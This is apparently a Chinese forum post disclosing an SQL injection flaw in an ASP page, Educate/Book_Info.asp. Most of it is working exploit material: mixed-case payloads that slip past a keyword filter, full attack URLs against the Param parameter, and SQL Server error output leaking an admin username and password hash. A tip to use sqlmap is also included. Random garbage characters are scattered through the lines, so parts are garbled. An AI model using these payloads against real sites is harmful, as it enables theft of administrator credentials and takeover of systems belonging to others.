漏洞出现在Educate/Book_Info.asp ) i$ C3 Y9 G% O+ ]( |( k. z: i- ]. ?
% c/ b# `. L7 Z2 R( U" o" o
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
+ k! A+ T: D* j) { P/ E6 |6 v1 T) U! P $ f3 z+ q0 w$ o6 e) ^
exp:如下
) P$ Y6 N5 _2 Y9 K% ~! F查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 Z* {* t5 ^% u% B% i/ M* C/ [7 j
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; ^/ B3 [: o& ?$ }1 B , ^8 ] p! @# d; X$ u7 ?
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
7 @+ \* Z B; U W/ H# v0 q ' D a$ m# l* _% g9 [
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
7 A5 _8 f/ Z5 p
; J, q4 f* s; q' W2 ? N8 ]5 @将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
: g& K% O" o; F: x c; q" ^
( D- g7 @/ v' v. K6 S$ j% s1 b9 |/Educate/Book_Info.asp,行 8
. b# V5 T r- _5 s4 V3 h+ I6 I) A, z
5 {3 _( P) v# ^' x, `* b! {http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) i* I: a- c3 n+ o) C, Z
5 {; T* F* `/ M0 Y& X7 QMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'0 _ f( E1 i! d T% M
! O& m$ i4 d5 j5 s7 K v7 I* [4 E
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。& ` ]; P( |$ S; G0 @& P4 {
0 {) @* N2 `1 @- a
/Educate/Book_Info.asp,行 8
1 D) S# t! h' v& u |